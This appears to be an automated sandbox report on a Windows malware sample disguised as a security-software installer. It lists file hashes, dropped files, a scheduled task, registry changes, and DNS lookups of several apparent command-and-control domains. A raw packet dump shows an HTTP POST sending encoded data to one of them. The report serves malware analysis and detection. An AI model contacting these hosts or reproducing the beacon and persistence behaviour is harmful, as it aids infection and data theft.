Analysis Date2014-10-02 10:14:01
MD503bbac7eb767684720d93000b09f8455
SHA1f16d3101fe908f5a611ed42bcea58c4b33d598f3

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: ac1803a74d8b505bfb3803ac34ba230e sha1: 23be41a7a317f96c3767f9c70b87c5edf75e8751 size: 8192
Section.rdata md5: 2d14035098fbc58787a3fa024aef021f sha1: 1cae3429477c1663d74fe0fbb6e051838d4b6392 size: 2048
Section.data md5: 3f0b8c0c8b300cb05eaecdbabcb44a5a sha1: 640eae422001901294ea9d86c9567e994b5cf4a2 size: 105472
Section.rsrc md5: 0d8a552a16c0d1aef88be291841c1a2d sha1: d8ecd30a9b6ea6d611bbc6439137174ed7e260e7 size: 5120
Timestamp2009-12-15 03:13:26
VersionLegalCopyright: Copyright © 2010 qt Setup Technologies
InternalName: Windows setup idd
FileVersion: 3.0.0.0
CompanyName: Jordan Russell
LegalTrademarks:
Comments:
ProductName: Internet Security H
ProductVersion: 3.0.0.0
FileDescription: v Setup Self-Extractor ua
OriginalFilename: Windows setup idd
PEhash1263ee088617c83a0fa84c8ef0d6c11e528a62b3
IMPhashb125375498aa0c8c0ee83ca0e9ab81d4

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\WINDOWS\Ojawia.exe
Creates FileC:\WINDOWS\Tasks\{810401E2-DDE0-454e-B0E2-AA89C9E5967C}.job
Creates FilePIPE\lsarpc
Creates ProcessC:\WINDOWS\Ojawia.exe
Creates MutexGlobal\{BC9BACEF-649A-45ff-A468-C000D051F283}

Process
↳ C:\WINDOWS\Ojawia.exe

RegistryHKEY_CURRENT_USER\Software\K8CE6CA1JO\OhuD ➝
5
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\\\x03\1601 ➝
NULL
Creates FileC:\WINDOWS\Tasks\{810401E2-DDE0-454e-B0E2-AA89C9E5967C}.job
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Deletes FileC:\WINDOWS\Tasks\{810401E2-DDE0-454e-B0E2-AA89C9E5967C}.job
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates MutexGlobal\{BC9BACEF-649A-45ff-A468-C000D051F283}

Network Details:

DNSning.com
Type: A
208.82.16.81
DNSkaskus.us
Type: A
192.31.186.4
DNSfqplus.com
Type: A
184.168.192.6
DNSiufaculty.com
Type: A
DNStopjer.com
Type: A
HTTP POSThttp://fqplus.com/1wave.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Flows TCP192.168.1.1:1031 ➝ 184.168.192.6:80

Raw Pcap
0x00000000 (00000)   504f5354 202f3177 6176652e 70687020   POST /1wave.php 
0x00000010 (00016)   48545450 2f312e31 0d0a4163 63657074   HTTP/1.1..Accept
0x00000020 (00032)   3a202a2f 2a0d0a43 6f6e7465 6e742d54   : */*..Content-T
0x00000030 (00048)   7970653a 20617070 6c696361 74696f6e   ype: application
0x00000040 (00064)   2f782d77 77772d66 6f726d2d 75726c65   /x-www-form-urle
0x00000050 (00080)   6e636f64 65640d0a 486f7374 3a206671   ncoded..Host: fq
0x00000060 (00096)   706c7573 2e636f6d 0d0a5573 65722d41   plus.com..User-A
0x00000070 (00112)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x00000080 (00128)   30202863 6f6d7061 7469626c 653b204d   0 (compatible; M
0x00000090 (00144)   53494520 362e303b 2057696e 646f7773   SIE 6.0; Windows
0x000000a0 (00160)   204e5420 352e3029 0d0a436f 6e74656e    NT 5.0)..Conten
0x000000b0 (00176)   742d4c65 6e677468 3a203330 350d0a43   t-Length: 305..C
0x000000c0 (00192)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x000000d0 (00208)   0d0a4361 6368652d 436f6e74 726f6c3a   ..Cache-Control:
0x000000e0 (00224)   206e6f2d 63616368 650d0a0d 0a646174    no-cache....dat
0x000000f0 (00240)   613d652f 65367235 4a5a5231 30466977   a=e/e6r5JZR10Fiw
0x00000100 (00256)   6f474c67 35315167 4339686e 6245786f   oGLg51QgC9hnbExo
0x00000110 (00272)   32316174 33614f59 6773552f 484c6b7a   21at3aOYgsU/HLkz
0x00000120 (00288)   66336375 77704474 52737935 2b65305a   f3cuwpDtRsy5+e0Z
0x00000130 (00304)   5a523733 6c455878 7a394854 64543678   ZR73lEXxz9HTdT6x
0x00000140 (00320)   33306564 63736477 4d4a4f64 41462f56   30edcsdwMJOdAF/V
0x00000150 (00336)   6a567357 48463045 79377a44 4a57392f   jVsWHF0Ey7zDJW9/
0x00000160 (00352)   73394a45 724a3070 66723832 51593662   s9JErJ0pfr82QY6b
0x00000170 (00368)   38484367 53754e61 55716967 346f5633   8HCgSuNaUqig4oV3
0x00000180 (00384)   4242774b 3274327a 37335247 65795544   BBwK2t2z73RGeyUD
0x00000190 (00400)   6a677375 48467043 4c4f696b 5250534c   jgsuHFpCLOikRPSL
0x000001a0 (00416)   39536a75 50314942 38624b70 6a746d4a   9SjuP1IB8bKpjtmJ
0x000001b0 (00432)   30696733 566d5663 4638616f 4f724252   0ig3VmVcF8aoOrBR
0x000001c0 (00448)   52437964 624b5067 4f69452f 6b7a6a67   RCydbKPgOiE/kzjg
0x000001d0 (00464)   4d764145 436d5643 62664b72 4e653657   MvAECmVCbfKrNe6W
0x000001e0 (00480)   6c486768 6b45546a 2f6b4776 38463630   lHghkETj/kGv8F60
0x000001f0 (00496)   5552444d 50686e34 70644941 44714678   URDMPhn4pdIADqFx
0x00000200 (00512)   42482f34 66663845 72776a6c 32555977   BH/4ff8Erwjl2UYw
0x00000210 (00528)   536c6572 34444378 3431415a 3450       Sler4DCx41AZ4P


Strings
..;.'
.
}
..E
.
_,....
..
040904E4
 2010 qt Setup Technologies 
3.0.0.0
BBABORT
Cannot open file "%s". %s
Comments
CompanyName
Copyright 
DVCLAL
Error reading %s%s%s: %s
Failed to get data for '%s'
FileDescription
FileVersion
InternalName
 Internet Security H
Invalid argument to date encode
Invalid argument to time encode
Invalid data type for '%s' List capacity out of bounds (%d)
Invalid property element: %s
Invalid property path
Invalid property type: %s
Invalid property value
Invalid stream format$''%s'' is not a valid component name
Jordan Russell
KR5a
LegalCopyright
LegalTrademarks
List count out of bounds (%d)
List index out of bounds (%d)+Out of memory while expanding memory stream
MS Sans Serif
OLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters!'%s' is not a valid integer value('%s' is not a valid floating point value
OriginalFilename
Out of memory
ProductName
ProductVersion
Property is read-only
Property %s does not exist
Resource %s not found
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
Stream read error
Stream write error
StringFileInfo
TEXTFILEDLG
Translation
VarFileInfo
v Setup Self-Extractor ua
VS_VERSION_INFO
 Windows setup idd
0u4v@ 
1d0=	$
1#)X>s>
2aFBiQ^
2.HzcL
)\@(2i
2o/lGx
33333333?333333
333333333333333333
3333333333333338
3333339
333338
33333833
333838
364uDnKW9
4%)*;,
42hAE:
4NcF@f
5J5WbX
61W0MI
66;DJJ'
6J],3*
6:Z-7~
;|7 u<o
7-:&YV
$7zTb9(
8]itS=
#."9]#
9+Gk<bI
9rsion[
9TaqdX1/
`9W7QXty
9XLvyp
9XxKD~
'A5RMd
ADVRPI
Apr _G
B0S(D"
|B2eU%
'BH\%H
bsI4sb
CA-;ak45
CeqEcO9
c#fWO2$
?Cg7JfR
Cha:F?
cJ8^{_42a
CL0ngIa
~CLv:Z
@.data
dk$Z</
DragQueryFileA
eO<3kA
?"ETVg	
E\V&$hJ
f4DH9S1
FindWindowA
FO6w]&f)N
<fQ$<h^5<1
FrameRect
GetActiveWindow
GetCapture
GetClassInfoA
GKl=wP
%G}m]w
	Gu(p@
H71R7R
Hbbxrc
&>,HD6
hgeHxgyF
hJH$	S
	hPp|x
I@+9;Q
":iJ7~
iK@9yk'
i-}P?['
`	iPr}{
I*yFul0
%JeMr{
jhjD^#/8@
k7(+1K
;Ke3}w
KERNEL32.dll
KERNUL
K_?<+*K
-K X>O
lE9zcj
|&LFkV|`
LG)*:f
LoadLibraryA
LocalAlloc
LocalFree
LocalReAlloc
+#=l'U
l(YnYk?
.<M53R
m5T<2tN<2:J
m[$dLi?_A
M=\X05
]n4 IBcIv
nAkjrr8SlI
NIQSTR7
\no":=
-n}qY/
NWD%Az
	` n:z
[nZBDb
o=5  1
O d<\>
oNr5WUN
OpenIcon
oshell32
P8$Q=/n
;pDtwM|
p$n*&F
P	\Ph9
pu,#Fp
QAE^XZ
-$QJp[
qviSH30K
\r5=?j
'RbClv
`.rdat}
`.rdata
#*r_!F
RK3k]{`
rlGU#*
ro[6jSV
RQPWja
rR/K6TH
s0;lv 
SHELL32.dll
Shell_NotifyIconW
SHFileOperationA
SHGetFolderPathA
SHGetSpecialFolderLocation
~	sVo`
T2RficMr
T2WqP<&
}t(9 	
T!C4}=
T'\er{R
This program must be run under Win32
tiBy?YToW#
TYTbjz8q3
TzYG#9U
 U{FNh
uFqvAH
uq|g8R8
user32.dll
V*hE_*B
Vi6Z#g
VirtualAlloc
VjAM8Gu
_VMMB3
"=V'Ts
W3Q<wk
w;%]]HZ=
wIDMJ2Mfl
 Windows setup idd
wz:]j$Z
=*x&,+
!XeIFq
xjl!0u
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>
	Y0Y'}
Y9XuJoAQ
YnETWq
YW[s<Sj=e
yWYkQrT
Zb#PXb
z[Hx+tD`/p@`=if
_*zK+&
	ZPH|Q